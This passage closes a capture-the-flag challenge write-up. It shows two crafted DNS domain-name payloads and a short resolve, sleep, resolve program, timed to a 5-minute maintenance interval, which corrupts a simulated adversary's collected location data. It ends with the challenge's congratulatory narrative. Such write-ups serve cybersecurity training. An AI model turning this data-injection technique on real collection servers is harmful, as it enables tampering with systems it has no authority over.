xH9VTTNG8FCNSIEMVI3BVSTD538824EI0DNNEUOVTR6I0GHQJADRVD8AJMMU2MQ.xPSKV0U0EBFN9C238PETTI4F6231UPP6RQ2192A4AAR6L8EBV55IL9GQR8PHKRP.xM9Ozxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.net-vwit67xv.example.com.

Now we have the two domain names for our payloads. We’ll want to send the first payload, sleep for 5 minutes to ensure aggregation occurs, then send the second payload; 5 minutes is the default maintenance interval in the code.

After skimming through thrower.py to get a basic idea of the expected syntax, we can use the following program.

resolve "xH9VTTNG8FCNSIEMVI3BVSTD538824EI0DNNEUOVTR6I0GHQJADRVD8AJMMU2MQ.xPSKV0U0EBFN9C238PETTI4F6231UPRDB8L013G0CS4EJJ8MHTF9RSPNB7SA868.xKzzzxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.net-vwit67xv"

sleep 300000

resolve "xH9VTTNG8FCNSIEMVI3BVSTD538824EI0DNNEUOVTR6I0GHQJADRVD8AJMMU2MQ.xPSKV0U0EBFN9C238PETTI4F6231UPP6RQ2192A4AAR6L8EBV55IL9GQR8PHKRP.xM9Ozxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.net-vwit67xv"

Submitting this solves the task and finally completes the entire challenge.

Result

CONGRATULATIONS!

The operation was a success. By corrupting the collected location data and stopping the leak, the adversary now has no idea where our JCTVs are located. Without this information, they are denied critical operational intelligence regarding our military assets.

GA rolled back the changes to the firmware and has locked down their network.

DIRNSA briefed the President on your work and how you completely mitigated the impact of the breach.

Great work by the next generation of cybersecurity professionals working at the NSA. Through your dedication, skills, and teamwork, NSA guaranteed the US military’s advantage on the battlefield.